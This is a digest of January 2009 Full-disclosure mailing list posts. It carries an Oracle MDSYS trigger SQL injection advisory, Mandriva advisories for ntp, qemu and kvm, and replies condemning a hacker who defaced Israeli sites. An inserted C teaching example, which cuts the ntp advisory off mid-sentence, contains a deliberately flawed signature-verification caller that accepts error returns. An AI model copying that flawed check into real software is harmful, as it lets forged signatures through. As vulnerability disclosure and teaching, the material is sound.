Oracle has just released a fix for a flaw that, when exploited, allows a low privileged authenticated database user to gain MDSYS privileges. This can be abused by an attacker to perform actions as the MDSYS user.

Details

MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the Oracle Spatial Application. It is vulnerable to SQL injection. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required.

Fix Information

Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner designed specifically for Oracle, can be used to accurately determine whether your servers are vulnerable to these flaws. More information about NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware

NGSSoftware, an NCC Group Company, develops vulnerability assessment and compliancy tools for database servers including Oracle, Microsoft SQL Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and Seattle in the United States; NGS provide services to some of the largest and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076
[Full-disclosure] [ MDVSA-2009:007 ] ntp
Mandriva Linux Security Advisory MDVSA-2009:007
http://www.mandriva.com/security/

Package : ntp
Date: January 13, 2009
Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0

Problem Description:

A flaw was found in how NTP checked the return value of signature verification. A remote attacker could use this to bypass certificate validation by using a malformed SSL/TLS signature (CVE-2009-0021).

The updated packages have been patched to prevent this issue.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report
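The class of flaw the ntp advisory describes, shown as a flawed check beside the corrected one. This is an added example, not NTP's code and not part of the advisory: `toy_verify()` is a hypothetical stand-in that follows the three-way return convention of OpenSSL's `EVP_VerifyFinal()` (1 valid, 0 invalid, -1 error), and the tag format and sample data are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy 4-byte tag (FNV-1a). It stands in for a real signature so the
 * example runs offline; it is NOT a signature scheme. */
static void toy_tag(const uint8_t *msg, size_t len, uint8_t tag[4])
{
    uint32_t h = 2166136261u;
    size_t i;

    for (i = 0; i < len; i++) {
        h ^= msg[i];
        h *= 16777619u;
    }
    tag[0] = (uint8_t)(h >> 24);
    tag[1] = (uint8_t)(h >> 16);
    tag[2] = (uint8_t)(h >> 8);
    tag[3] = (uint8_t)h;
}

/* Hypothetical encoding: one length byte (always 4) followed by the tag. */
void toy_sign(const uint8_t *msg, size_t len, uint8_t sig[5])
{
    sig[0] = 4;
    toy_tag(msg, len, sig + 1);
}

/* Returns 1 = valid, 0 = invalid, -1 = error (signature cannot be parsed). */
int toy_verify(const uint8_t *msg, size_t mlen,
               const uint8_t *sig, size_t slen)
{
    uint8_t want[4];

    if (slen != 5 || sig[0] != 4)
        return -1;                  /* malformed: an error, not "invalid" */
    toy_tag(msg, mlen, want);
    return memcmp(sig + 1, want, 4) == 0 ? 1 : 0;
}

/* Flawed caller: only 0 is treated as failure, so the -1 error result
 * falls through and the message is accepted. */
int accept_flawed(const uint8_t *msg, size_t mlen,
                  const uint8_t *sig, size_t slen)
{
    if (!toy_verify(msg, mlen, sig, slen))
        return 0;
    return 1;
}

/* Corrected caller: anything other than 1 is a rejection. */
int accept_fixed(const uint8_t *msg, size_t mlen,
                 const uint8_t *sig, size_t slen)
{
    return toy_verify(msg, mlen, sig, slen) == 1;
}

int main(void)
{
    const uint8_t msg[] = "constructed packet";
    uint8_t good[5], bad[5], malformed[5];

    toy_sign(msg, sizeof msg, good);
    memcpy(bad, good, 5);
    bad[4] ^= 0xff;                 /* wrong tag, well-formed encoding */
    memcpy(malformed, good, 5);
    malformed[0] = 9;               /* length byte no longer matches */

    printf("good:      flawed=%d fixed=%d\n",
           accept_flawed(msg, sizeof msg, good, 5),
           accept_fixed(msg, sizeof msg, good, 5));
    printf("bad:       flawed=%d fixed=%d\n",
           accept_flawed(msg, sizeof msg, bad, 5),
           accept_fixed(msg, sizeof msg, bad, 5));
    printf("malformed: flawed=%d fixed=%d\n",
           accept_flawed(msg, sizeof msg, malformed, 5),
           accept_fixed(msg, sizeof msg, malformed, 5));
    return 0;
}
```

When auditing other callers for the same mistake, look for verification results tested with `!` or `!= 0` rather than compared against 1.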
[Full-disclosure] [ MDVSA-2009:008 ] qemu
Mandriva Linux Security Advisory MDVSA-2009:008
http://www.mandriva.com/security/

Package : qemu
Date: January 14, 2009
Affected: 2009.0

Problem Description:

Security vulnerabilities have been discovered and corrected in VNC server of qemu version 0.9.1 and earlier, which could lead to denial-of-service attacks (CVE-2008-2382), and make it easier for remote crackers to guess the VNC password (CVE-2008-5714).

The updated packages have been patched to prevent this.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
[Full-disclosure] [ MDVSA-2009:009 ] kvm
Mandriva Linux Security Advisory MDVSA-2009:009
http://www.mandriva.com/security/

Package : kvm
Date: January 14, 2009
Affected: 2009.0

Problem Description:

Security vulnerabilities have been discovered and corrected in VNC server of kvm version 79 and earlier, which could lead to denial-of-service attacks (CVE-2008-2382), and make it easier for remote crackers to guess the VNC password (CVE-2008-5714).

The updated packages have been patched to prevent this.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5714

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: [Full-disclosure] e-Holocaust
Okay e.hitler you mention you're attacking Israeli servers*, let's ignore the impact of that for a second.

e.Hitler I want you to tell me, in more than a sentence, why you did that. Yeh, you failed to mention it in your original post. Tell me exactly how your cause makes you feel, and why.

Now tell me how what you're doing makes a difference, that is: 'In what way does what you did help solve the problem that was bothering you?' (read it!: HOW does it make a difference, don't just tell me THAT it makes a difference, I want you to describe out a sequence of events.

One more question. Do you think you're a good hacker (in terms of skill). I'm not saying you're good or bad, I've no idea. Furthermore I couldn't tell you what makes a good hacker, I don't know enough (any) of them. Do you think that this event here proves that, or at least aids proving it?

*Btw defacements happen all the time - wanna do some research on pathetic skiddies? search the 'google dorks' included in web app exploits when they're published on milw0rm. They're actually competing for the servers (re-owning them, etc). Those 21 sites are a drop in the ocean compared to how many (even anti-Israeli, and the other side) defacements have happened.

As for the paypal accounts and (so called) 'ownage' of individuals and their personal data, really this is another drop in the ocean for Israel (what its economy). Compare the well-being of these individuals with the number of people being killed in a WAR! Hell! Compare it to the holocaust, now argue with a WWII vet or holocaust survivor (are there any still living?) that you are e.Hitler, righteous internet warrior. Not only that, most CC companies give you the money you lost scams or stolen paypals. You can even cancel it before transactions are paid. Then there's insurance companies.

Cheers.
[Full-disclosure] [ MDVSA-2009:010 ] qemu
Mandriva Linux Security Advisory MDVSA-2009:010
http://www.mandriva.com/security/

Package : qemu
Date: January 14, 2009
Affected: 2008.0, 2008.1

Problem Description:

A security vulnerability has been discovered and corrected in VNC server of qemu 0.9.1 and earlier, which could lead to a denial-of-service attack (CVE-2008-2382).

The updated packages have been patched to prevent this.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2382

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact security_(at)_mandriva.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: [Full-disclosure] e-Holocaust
you had the wrong assumption that he is used to thinking or at least knows how to do that. In order to answer your email in any intelligent manner, he will first have to think. He does not have that skill.

On Tue, Jan 13, 2009 at 8:06 PM, Some Guy Posting To Full Disclosure fd.le...@googlemail.com wrote:

Okay e.hitler you mention you're attacking Israeli servers*, let's ignore the impact of that for a second.

e.Hitler I want you to tell me, in more than a sentence, why you did that. Yeh, you failed to mention it in your original post. Tell me exactly how your cause makes you feel, and why.

Now tell me how what you're doing makes a difference, that is: 'In what way does what you did help solve the problem that was bothering you?' (read it!: HOW does it make a difference, don't just tell me THAT it makes a difference, I want you to describe out a sequence of events.

One more question. Do you think you're a good hacker (in terms of skill). I'm not saying you're good or bad, I've no idea. Furthermore I couldn't tell you what makes a good hacker, I don't know enough (any) of them. Do you think that this event here proves that, or at least aids proving it?

*Btw defacements happen all the time - wanna do some research on pathetic skiddies? search the 'google dorks' included in web app exploits when they're published on milw0rm. They're actually competing for the servers (re-owning them, etc). Those 21 sites are a drop in the ocean compared to how many (even anti-Israeli, and the other side) defacements have happened.

As for the paypal accounts and (so called) 'ownage' of individuals and their personal data, really this is another drop in the ocean for Israel (what its economy). Compare the well-being of these individuals with the number of people being killed in a WAR! Hell! Compare it to the holocaust, now argue with a WWII vet or holocaust survivor (are there any still living?) that you are e.Hitler, righteous internet warrior. Not only that, most CC companies give you the money you lost scams or stolen paypals. You can even cancel it before transactions are paid. Then there's insurance companies.

Cheers.